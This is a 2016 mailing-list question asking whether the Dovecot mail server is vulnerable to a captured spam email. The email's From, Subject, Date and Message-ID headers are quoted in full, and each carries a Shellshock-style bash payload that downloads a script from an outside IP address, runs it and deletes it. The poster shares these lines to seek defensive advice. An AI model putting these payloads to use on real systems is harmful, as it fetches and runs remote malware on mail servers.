is dovecot vulnerable to this kind of attack?
Louis Kowolowski
louisk at cryptomonkeys.org
Wed Jan 27 20:10:05 UTC 2016
I found an interesting email that got caught in my spam quarantine. I’m wondering if dovecot is vulnerable to this kind of code execution (I’m aware that other components could be vulnerable, but this question is specifically targeting dovecot).
The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery.
Examples include:
From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;,
wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;
Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
The full message, should it be of interest, can be found here:
https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
Thank you!
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Louis Kowolowski louisk at cryptomonkeys.org
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